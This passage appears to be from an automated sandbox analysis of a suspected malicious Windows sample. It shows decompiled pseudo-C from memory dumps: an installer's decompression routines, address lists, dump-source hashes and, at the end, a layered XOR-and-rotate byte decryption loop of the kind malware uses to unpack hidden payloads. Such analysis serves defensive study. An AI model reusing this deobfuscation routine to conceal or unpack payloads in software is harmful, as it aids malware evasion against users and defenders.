                                        													__eflags = __ecx - 1;
                                        													if(__ecx < 1) {
                                        														goto L9;
                                        													}
                                        													L88:
                                        													__edi =  *(__esi + 8 + __ecx * 4);
                                        													goto L90;
                                        												}
                                        												L78:
                                        												__ecx = __edx;
                                        												__ebx = __ebx - __edx;
                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                        												__ecx = __esi[2];
                                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                        												__esi[2] = __esi[2] + 1;
                                        											}
                                        											L94:
                                        											__eax = __esi[1];
                                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                        											__edi = __eax;
                                        											__eax = __eax >> 5;
                                        											__edi = __edi & 0x0000001f;
                                        											__ecx = 0x101;
                                        											__eax = __eax & 0x0000001f;
                                        											__edi = __edi + 0x101;
                                        											__eax = __eax + 1;
                                        											__edx = __ebp - 0xc;
                                        											 *(__ebp - 0x14) = __eax;
                                        											 &(__esi[0x148]) = __ebp - 4;
                                        											 *(__ebp - 4) = 9;
                                        											__ebp - 0x18 =  &(__esi[3]);
                                        											 *(__ebp - 0x10) = 6;
                                        											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                        											__eflags =  *(__ebp - 4);
                                        											if( *(__ebp - 4) == 0) {
                                        												__eax = __eax | 0xffffffff;
                                        												__eflags = __eax;
                                        											}
                                        											__eflags = __eax;
                                        											if(__eax != 0) {
                                        												goto L9;
                                        											} else {
                                        												L97:
                                        												__ebp - 0xc =  &(__esi[0x148]);
                                        												__ebp - 0x10 = __ebp - 0x1c;
                                        												__eax = __esi + 0xc + __edi * 4;
                                        												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                        												__eflags = __eax;
                                        												if(__eax != 0) {
                                        													goto L9;
                                        												}
                                        												L98:
                                        												__eax =  *(__ebp - 0x10);
                                        												__eflags =  *(__ebp - 0x10);
                                        												if( *(__ebp - 0x10) != 0) {
                                        													L100:
                                        													__cl =  *(__ebp - 4);
                                        													 *__esi =  *__esi & 0x00000000;
                                        													__eflags =  *__esi;
                                        													__esi[4] = __al;
                                        													__eax =  *(__ebp - 0x18);
                                        													__esi[5] =  *(__ebp - 0x18);
                                        													__eax =  *(__ebp - 0x1c);
                                        													__esi[4] = __cl;
                                        													__esi[6] =  *(__ebp - 0x1c);
                                        													goto L101;
                                        												}
                                        												L99:
                                        												__eflags = __edi - 0x101;
                                        												if(__edi > 0x101) {
                                        													goto L9;
                                        												}
                                        												goto L100;
                                        											}
                                        										case 0xe:
                                        											goto L9;
                                        										case 0xf:
                                        											L175:
                                        											__eax =  *(__ebp - 0x30);
                                        											__esi[0x26ea] =  *(__ebp - 0x30);
                                        											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                        											__ecx = __esi[0x26ea];
                                        											__edx = __esi[0x26e9];
                                        											__eflags = __ecx - __edx;
                                        											 *(__ebp - 0x30) = __ecx;
                                        											if(__ecx >= __edx) {
                                        												__eax = __esi[0x26e8];
                                        												__eax = __esi[0x26e8] - __ecx;
                                        												__eflags = __eax;
                                        											} else {
                                        												__edx = __edx - __ecx;
                                        												__eax = __edx - __ecx - 1;
                                        											}
                                        											__eflags = __ecx - __edx;
                                        											 *(__ebp - 0x2c) = __eax;
                                        											if(__ecx != __edx) {
                                        												L183:
                                        												__edi = 0;
                                        												goto L10;
                                        											} else {
                                        												L179:
                                        												__eax = __esi[0x145];
                                        												__eflags = __eax - 8;
                                        												 *__esi = __eax;
                                        												if(__eax != 8) {
                                        													L184:
                                        													0 = 1;
                                        													goto L10;
                                        												}
                                        												goto L180;
                                        											}
                                        									}
                                        								}
                                        								L181:
                                        								goto L9;
                                        							}
                                        							L70:
                                        							if( *__edi == __eax) {
                                        								goto L72;
                                        							}
                                        							L71:
                                        							__esi[2] = __esi[2] & __eax;
                                        							 *__esi = 0xd;
                                        							goto L93;
                                        						}
                                        					}
                                        				}
                                        				L182:
                                        				_t443 = 0;
                                        				_t446[0x147] =  *(_t448 - 0x40);
                                        				_t446[0x146] = _t425;
                                        				( *(_t448 + 8))[1] = 0;
                                        				goto L11;
                                        			}









                                        0x00406177
                                        0x0040613e
                                        0x004060e1
                                        0x004060e1
                                        0x004060e2
                                        0x0040612c
                                        0x00000000
                                        0x0040612c
                                        0x004060e4
                                        0x004060e5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406241
                                        0x00406241
                                        0x00406241
                                        0x00406244
                                        0x00000000
                                        0x00000000
                                        0x00406221
                                        0x00406221
                                        0x00406225
                                        0x00000000
                                        0x00000000
                                        0x0040622b
                                        0x0040622b
                                        0x0040622e
                                        0x00406231
                                        0x00406236
                                        0x00406238
                                        0x0040623b
                                        0x0040623e
                                        0x0040623e
                                        0x0040623e
                                        0x00406246
                                        0x00406246
                                        0x00406249
                                        0x0040624b
                                        0x00406250
                                        0x00406253
                                        0x00406255
                                        0x00406258
                                        0x00000000
                                        0x00000000
                                        0x0040625e
                                        0x0040625e
                                        0x00406260
                                        0x00000000
                                        0x00000000
                                        0x00406266
                                        0x00406266
                                        0x0040626a
                                        0x00000000
                                        0x00000000
                                        0x00406270
                                        0x00406270
                                        0x00406273
                                        0x00406275
                                        0x00406313
                                        0x00406313
                                        0x00406316
                                        0x00406318
                                        0x00406318
                                        0x0040631b
                                        0x0040631e
                                        0x00406320
                                        0x00406322
                                        0x00406324
                                        0x00406324
                                        0x0040632d
                                        0x00406332
                                        0x00406335
                                        0x00406338
                                        0x0040633b
                                        0x0040633e
                                        0x0040633e
                                        0x0040633e
                                        0x00406341
                                        0x00406347
                                        0x00406347
                                        0x0040634d
                                        0x0040634d
                                        0x0040634d
                                        0x00000000
                                        0x00406341
                                        0x0040627b
                                        0x0040627b
                                        0x00406281
                                        0x00406284
                                        0x00406286
                                        0x004062b1
                                        0x004062b4
                                        0x004062ba
                                        0x004062bf
                                        0x004062c5
                                        0x004062cb
                                        0x004062cd
                                        0x004062d0
                                        0x004062d9
                                        0x004062df
                                        0x004062df
                                        0x004062d2
                                        0x004062d4
                                        0x004062d6
                                        0x004062d6
                                        0x004062e1
                                        0x004062e7
                                        0x004062ea
                                        0x004062ec
                                        0x004062ee
                                        0x004062f4
                                        0x004062f6
                                        0x004062f8
                                        0x004062fb
                                        0x00406304
                                        0x00406304
                                        0x00406306
                                        0x004062fd
                                        0x004062fd
                                        0x00406300
                                        0x00406300
                                        0x00406308
                                        0x00406308
                                        0x004062f6
                                        0x0040630b
                                        0x0040630d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040630d
                                        0x00406288
                                        0x00406288
                                        0x0040628e
                                        0x00406294
                                        0x00406296
                                        0x00000000
                                        0x00000000
                                        0x00406298
                                        0x00406298
                                        0x0040629a
                                        0x0040629c
                                        0x0040629f
                                        0x004062a6
                                        0x004062a6
                                        0x004062a8
                                        0x004062a1
                                        0x004062a1
                                        0x004062a3
                                        0x004062a3
                                        0x004062aa
                                        0x004062ac
                                        0x004062af
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004063b3
                                        0x004063b6
                                        0x004063b9
                                        0x004063bf
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406596
                                        0x00406596
                                        0x00406596
                                        0x00406599
                                        0x0040659c
                                        0x0040659e
                                        0x004065a1
                                        0x004065a7
                                        0x004065ae
                                        0x004065b0
                                        0x00000000
                                        0x00000000
                                        0x00406484
                                        0x00406484
                                        0x004064ac
                                        0x004064ac
                                        0x004064ac
                                        0x004064ae
                                        0x00000000
                                        0x00000000
                                        0x0040648c
                                        0x0040648c
                                        0x00406490
                                        0x00000000
                                        0x00000000
                                        0x00406496
                                        0x00406496
                                        0x00406499
                                        0x0040649c
                                        0x0040649f
                                        0x004064a1
                                        0x004064a3
                                        0x004064a6
                                        0x004064a9
                                        0x004064a9
                                        0x004064a9
                                        0x004064b0
                                        0x004064b0
                                        0x004064b8
                                        0x004064bb
                                        0x004064c1
                                        0x004064c4
                                        0x004064c8
                                        0x004064cc
                                        0x004064cf
                                        0x004064d2
                                        0x004064ea
                                        0x004064ea
                                        0x004064ed
                                        0x004064fb
                                        0x004064fe
                                        0x004064ef
                                        0x004064ef
                                        0x004064f1
                                        0x004064f8
                                        0x004064f8
                                        0x00406527
                                        0x00406527
                                        0x00406527
                                        0x0040652a
                                        0x0040652c
                                        0x00000000
                                        0x00000000
                                        0x00406507
                                        0x00406507
                                        0x0040650b
                                        0x00000000
                                        0x00000000
                                        0x00406511
                                        0x00406511
                                        0x00406514
                                        0x00406517
                                        0x0040651a
                                        0x0040651c
                                        0x0040651e
                                        0x00406521
                                        0x00406524
                                        0x00406524
                                        0x00406524
                                        0x0040652e
                                        0x0040652e
                                        0x00406530
                                        0x00406532
                                        0x0040653d
                                        0x00406540
                                        0x00406543
                                        0x00406545
                                        0x00406547
                                        0x00406549
                                        0x0040654c
                                        0x0040654f
                                        0x00406554
                                        0x00406557
                                        0x0040655a
                                        0x0040655d
                                        0x00406564
                                        0x00406567
                                        0x00406569
                                        0x00000000
                                        0x00000000
                                        0x0040656f
                                        0x0040656f
                                        0x00406573
                                        0x00406584
                                        0x00406584
                                        0x00406584
                                        0x00406586
                                        0x00406586
                                        0x0040658a
                                        0x0040658a
                                        0x0040658a
                                        0x0040658c
                                        0x0040658d
                                        0x00406590
                                        0x00406590
                                        0x00406590
                                        0x00406593
                                        0x00000000
                                        0x00406593
                                        0x00406575
                                        0x00406575
                                        0x00406578
                                        0x00000000
                                        0x00000000
                                        0x0040657e
                                        0x0040657e
                                        0x00000000
                                        0x0040657e
                                        0x004064d4
                                        0x004064d4
                                        0x004064d6
                                        0x004064d8
                                        0x004064db
                                        0x004064de
                                        0x004064e2
                                        0x004064e2
                                        0x004065b6
                                        0x004065b6
                                        0x004065b9
                                        0x004065c0
                                        0x004065c4
                                        0x004065c6
                                        0x004065c9
                                        0x004065cc
                                        0x004065d1
                                        0x004065d4
                                        0x004065d6
                                        0x004065d7
                                        0x004065da
                                        0x004065e5
                                        0x004065e8
                                        0x004065ff
                                        0x00406604
                                        0x0040660b
                                        0x00406610
                                        0x00406614
                                        0x00406616
                                        0x00406616
                                        0x00406616
                                        0x00406619
                                        0x0040661b
                                        0x00000000
                                        0x00406621
                                        0x00406621
                                        0x00406625
                                        0x00406630
                                        0x00406643
                                        0x00406648
                                        0x0040664d
                                        0x0040664f
                                        0x00000000
                                        0x00000000
                                        0x00406655
                                        0x00406655
                                        0x00406658
                                        0x0040665a
                                        0x00406668
                                        0x00406668
                                        0x0040666b
                                        0x0040666b
                                        0x0040666e
                                        0x00406671
                                        0x00406674
                                        0x00406677
                                        0x0040667a
                                        0x0040667d
                                        0x00000000
                                        0x0040667d
                                        0x0040665c
                                        0x0040665c
                                        0x00406662
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406662
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406a01
                                        0x00406a01
                                        0x00406a07
                                        0x00406a0d
                                        0x00406a12
                                        0x00406a18
                                        0x00406a1e
                                        0x00406a20
                                        0x00406a23
                                        0x00406a2c
                                        0x00406a32
                                        0x00406a32
                                        0x00406a25
                                        0x00406a27
                                        0x00406a29
                                        0x00406a29
                                        0x00406a34
                                        0x00406a36
                                        0x00406a39
                                        0x00406a74
                                        0x00406a74
                                        0x00000000
                                        0x00406a3b
                                        0x00406a3b
                                        0x00406a3b
                                        0x00406a41
                                        0x00406a44
                                        0x00406a46
                                        0x00406a7b
                                        0x00406a7d
                                        0x00000000
                                        0x00406a7d
                                        0x00000000
                                        0x00406a46
                                        0x00000000
                                        0x00406085
                                        0x00406a53
                                        0x00000000
                                        0x00406a53
                                        0x00406467
                                        0x00406469
                                        0x00000000
                                        0x00000000
                                        0x0040646b
                                        0x0040646b
                                        0x0040646e
                                        0x00000000
                                        0x0040646e
                                        0x004063b3
                                        0x00406374
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a5d
                                        0x00406a66
                                        0x00406a6c
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                        • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                        • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                        • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                        				signed int _v8;
                                        				unsigned int _v12;
                                        				signed int _v16;
                                        				intOrPtr _v20;
                                        				signed int _v24;
                                        				signed int _v28;
                                        				intOrPtr* _v32;
                                        				signed int* _v36;
                                        				signed int _v40;
                                        				signed int _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				void _v116;
                                        				signed int _v176;
                                        				signed int _v180;
                                        				signed int _v240;
                                        				signed int _t166;
                                        				signed int _t168;
                                        				intOrPtr _t175;
                                        				signed int _t181;
                                        				void* _t182;
                                        				intOrPtr _t183;
                                        				signed int* _t184;
                                        				signed int _t186;
                                        				signed int _t187;
                                        				signed int* _t189;
                                        				signed int _t190;
                                        				intOrPtr* _t191;
                                        				intOrPtr _t192;
                                        				signed int _t193;
                                        				signed int _t195;
                                        				signed int _t200;
                                        				signed int _t205;
                                        				void* _t207;
                                        				short _t208;
                                        				signed char _t222;
                                        				signed int _t224;
                                        				signed int _t225;
                                        				signed int* _t232;
                                        				signed int _t233;
                                        				signed int _t234;
                                        				void* _t235;
                                        				signed int _t236;
                                        				signed int _t244;
                                        				signed int _t246;
                                        				signed int _t251;
                                        				signed int _t254;
                                        				signed int _t256;
                                        				signed int _t259;
                                        				signed int _t262;
                                        				void* _t263;
                                        				void* _t264;
                                        				signed int _t267;
                                        				intOrPtr _t269;
                                        				intOrPtr _t271;
                                        				signed int _t274;
                                        				intOrPtr* _t275;
                                        				unsigned int _t276;
                                        				void* _t277;
                                        				signed int _t278;
                                        				intOrPtr* _t279;
                                        				signed int _t281;
                                        				intOrPtr _t282;
                                        				intOrPtr _t283;
                                        				signed int* _t284;
                                        				signed int _t286;
                                        				signed int _t287;
                                        				signed int _t288;
                                        				signed int _t296;
                                        				signed int* _t297;
                                        				intOrPtr _t298;
                                        				void* _t299;
                                        
                                        				_t278 = _a8;
                                        				_t187 = 0x10;
                                        				memset( &_v116, 0, _t187 << 2);
                                        				_t189 = _a4;
                                        				_t233 = _t278;
                                        				do {
                                        					_t166 =  *_t189;
                                        					_t189 =  &(_t189[1]);
                                        					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                        					_t233 = _t233 - 1;
                                        				} while (_t233 != 0);
                                        				if(_v116 != _t278) {
                                        					_t279 = _a28;
                                        					_t267 =  *_t279;
                                        					_t190 = 1;
                                        					_a28 = _t267;
                                        					_t234 = 0xf;
                                        					while(1) {
                                        						_t168 = 0;
                                        						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                        							break;
                                        						}
                                        						_t190 = _t190 + 1;
                                        						if(_t190 <= _t234) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_v8 = _t190;
                                        					if(_t267 < _t190) {
                                        						_a28 = _t190;
                                        					}
                                        					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                        						_t234 = _t234 - 1;
                                        						if(_t234 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_v28 = _t234;
                                        					if(_a28 > _t234) {
                                        						_a28 = _t234;
                                        					}
                                        					 *_t279 = _a28;
                                        					_t181 = 1 << _t190;
                                        					while(_t190 < _t234) {
                                        						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                        						if(_t182 < 0) {
                                        							L64:
                                        							return _t168 | 0xffffffff;
                                        						}
                                        						_t190 = _t190 + 1;
                                        						_t181 = _t182 + _t182;
                                        					}
                                        					_t281 = _t234 << 2;
                                        					_t191 = _t299 + _t281 - 0x70;
                                        					_t269 =  *_t191;
                                        					_t183 = _t181 - _t269;
                                        					_v52 = _t183;
                                        					if(_t183 < 0) {
                                        						goto L64;
                                        					}
                                        					_v176 = _t168;
                                        					 *_t191 = _t269 + _t183;
                                        					_t192 = 0;
                                        					_t235 = _t234 - 1;
                                        					if(_t235 == 0) {
                                        						L21:
                                        						_t184 = _a4;
                                        						_t271 = 0;
                                        						do {
                                        							_t193 =  *_t184;
                                        							_t184 =  &(_t184[1]);
                                        							if(_t193 != _t168) {
                                        								_t232 = _t299 + _t193 * 4 - 0xb0;
                                        								_t236 =  *_t232;
                                        								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
                                        								 *_t232 = _t236 + 1;
                                        							}
                                        							_t271 = _t271 + 1;
                                        						} while (_t271 < _a8);
                                        						_v16 = _v16 | 0xffffffff;
                                        						_v40 = _v40 & 0x00000000;
                                        						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                        						_t195 = _v8;
                                        						_t186 =  ~_a28;
                                        						_v12 = _t168;
                                        						_v180 = _t168;
                                        						_v36 = 0x42ceb8;
                                        						_v240 = _t168;
                                        						if(_t195 > _v28) {
                                        							L62:
                                        							_t168 = 0;
                                        							if(_v52 == 0 || _v28 == 1) {
                                        								return _t168;
                                        							} else {
                                        								goto L64;
                                        							}
                                        						}
                                        						_v44 = _t195 - 1;
                                        						_v32 = _t299 + _t195 * 4 - 0x70;
                                        						do {
                                        							_t282 =  *_v32;
                                        							if(_t282 == 0) {
                                        								goto L61;
                                        							}
                                        							while(1) {
                                        								_t283 = _t282 - 1;
                                        								_t200 = _a28 + _t186;
                                        								_v48 = _t283;
                                        								_v24 = _t200;
                                        								if(_v8 <= _t200) {
                                        									goto L45;
                                        								}
                                        								L31:
                                        								_v20 = _t283 + 1;
                                        								do {
                                        									_v16 = _v16 + 1;
                                        									_t296 = _v28 - _v24;
                                        									if(_t296 > _a28) {
                                        										_t296 = _a28;
                                        									}
                                        									_t222 = _v8 - _v24;
                                        									_t254 = 1 << _t222;
                                        									if(1 <= _v20) {
                                        										L40:
                                        										_t256 =  *_a36;
                                        										_t168 = 1 << _t222;
                                        										_v40 = 1;
                                        										_t274 = _t256 + 1;
                                        										if(_t274 > 0x5a0) {
                                        											goto L64;
                                        										}
                                        									} else {
                                        										_t275 = _v32;
                                        										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                        										if(_t222 >= _t296) {
                                        											goto L40;
                                        										}
                                        										while(1) {
                                        											_t222 = _t222 + 1;
                                        											if(_t222 >= _t296) {
                                        												goto L40;
                                        											}
                                        											_t275 = _t275 + 4;
                                        											_t264 = _t263 + _t263;
                                        											_t175 =  *_t275;
                                        											if(_t264 <= _t175) {
                                        												goto L40;
                                        											}
                                        											_t263 = _t264 - _t175;
                                        										}
                                        										goto L40;
                                        									}
                                        									_t168 = _a32 + _t256 * 4;
                                        									_t297 = _t299 + _v16 * 4 - 0xec;
                                        									 *_a36 = _t274;
                                        									_t259 = _v16;
                                        									 *_t297 = _t168;
                                        									if(_t259 == 0) {
                                        										 *_a24 = _t168;
                                        									} else {
                                        										_t276 = _v12;
                                        										_t298 =  *((intOrPtr*)(_t297 - 4));
                                        										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                        										_a5 = _a28;
                                        										_a4 = _t222;
                                        										_t262 = _t276 >> _t186;
                                        										_a6 = (_t168 - _t298 >> 2) - _t262;
                                        										 *(_t298 + _t262 * 4) = _a4;
                                        									}
                                        									_t224 = _v24;
                                        									_t186 = _t224;
                                        									_t225 = _t224 + _a28;
                                        									_v24 = _t225;
                                        								} while (_v8 > _t225);
                                        								L45:
                                        								_t284 = _v36;
                                        								_a5 = _v8 - _t186;
                                        								if(_t284 < 0x42ceb8 + _a8 * 4) {
                                        									_t205 =  *_t284;
                                        									if(_t205 >= _a12) {
                                        										_t207 = _t205 - _a12 + _t205 - _a12;
                                        										_v36 =  &(_v36[1]);
                                        										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                        										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                        									} else {
                                        										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                        										_t208 =  *_t284;
                                        										_v36 =  &(_t284[1]);
                                        									}
                                        									_a6 = _t208;
                                        								} else {
                                        									_a4 = 0xc0;
                                        								}
                                        								_t286 = 1 << _v8 - _t186;
                                        								_t244 = _v12 >> _t186;
                                        								while(_t244 < _v40) {
                                        									 *(_t168 + _t244 * 4) = _a4;
                                        									_t244 = _t244 + _t286;
                                        								}
                                        								_t287 = _v12;
                                        								_t246 = 1 << _v44;
                                        								while((_t287 & _t246) != 0) {
                                        									_t287 = _t287 ^ _t246;
                                        									_t246 = _t246 >> 1;
                                        								}
                                        								_t288 = _t287 ^ _t246;
                                        								_v20 = 1;
                                        								_v12 = _t288;
                                        								_t251 = _v16;
                                        								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                        									L60:
                                        									if(_v48 != 0) {
                                        										_t282 = _v48;
                                        										_t283 = _t282 - 1;
                                        										_t200 = _a28 + _t186;
                                        										_v48 = _t283;
                                        										_v24 = _t200;
                                        										if(_v8 <= _t200) {
                                        											goto L45;
                                        										}
                                        										goto L31;
                                        									}
                                        									break;
                                        								} else {
                                        									goto L58;
                                        								}
                                        								do {
                                        									L58:
                                        									_t186 = _t186 - _a28;
                                        									_t251 = _t251 - 1;
                                        								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                        								_v16 = _t251;
                                        								goto L60;
                                        							}
                                        							L61:
                                        							_v8 = _v8 + 1;
                                        							_v32 = _v32 + 4;
                                        							_v44 = _v44 + 1;
                                        						} while (_v8 <= _v28);
                                        						goto L62;
                                        					}
                                        					_t277 = 0;
                                        					do {
                                        						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                        						_t277 = _t277 + 4;
                                        						_t235 = _t235 - 1;
                                        						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                        					} while (_t235 != 0);
                                        					goto L21;
                                        				}
                                        				 *_a24 =  *_a24 & 0x00000000;
                                        				 *_a28 =  *_a28 & 0x00000000;
                                        				return 0;
                                        			}


                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                        • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                        • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                        • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E7333AA08(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                        				signed int _v5;
                                        				signed int _v12;
                                        
                                        				_v12 = _v12 & 0x00000000;
                                        				_v12 = _v12 & 0x00000000;
                                        				while(_v12 < _a8) {
                                        					_v5 =  *((intOrPtr*)(_a4 + _v12));
                                        					_v5 = (_v5 & 0x000000ff) + 0x79;
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000e3;
                                        					_v5 =  ~(_v5 & 0x000000ff);
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
                                        					_v5 = (_v5 & 0x000000ff) + 0x35;
                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                        					_v5 = (_v5 & 0x000000ff) + 0x22;
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000ef;
                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                        					_v5 = _v5 & 0x000000ff ^ 0x0000001e;
                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                        					_v5 = _v5 & 0x000000ff ^ 0x00000026;
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000ba;
                                        					_v5 =  !(_v5 & 0x000000ff);
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000ce;
                                        					_v5 = (_v5 & 0x000000ff) + _v12;
                                        					_v5 = _v5 & 0x000000ff ^ 0x00000064;
                                        					_v5 = (_v5 & 0x000000ff) - 0xfc;
                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
                                        					_v5 =  !(_v5 & 0x000000ff);
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                        					_v5 =  ~(_v5 & 0x000000ff);
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                        					_v5 = (_v5 & 0x000000ff) + _v12;
                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                        					_v5 = (_v5 & 0x000000ff) + _v12;
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
                                        					_v5 =  ~(_v5 & 0x000000ff);
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000dd;
                                        					_v5 = (_v5 & 0x000000ff) - 0x66;
                                        					_v5 =  !(_v5 & 0x000000ff);
                                        					_v5 =  ~(_v5 & 0x000000ff);
                                        					_v5 =  !(_v5 & 0x000000ff);
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000f1;
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
                                        					_v5 = (_v5 & 0x000000ff) - 0x93;
                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
                                        					_v5 = (_v5 & 0x000000ff) - 0xc;
                                        					_v5 = _v5 & 0x000000ff ^ 0x000000dc;
                                        					_v5 =  ~(_v5 & 0x000000ff);
                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                        					_v5 = (_v5 & 0x000000ff) + _v12;
                                        					_v5 =  ~(_v5 & 0x000000ff);
                                        					_v5 = _v5 & 0x000000ff ^ _v12;
                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                        					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
                                        					_v5 =  !(_v5 & 0x000000ff);
                                        					_v5 = (_v5 & 0x000000ff) - _v12;
                                        					 *((char*)(_a4 + _v12)) = _v5;
                                        					_v12 = _v12 + 1;
                                        				}
                                        				return _a4;
                                        			}






                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
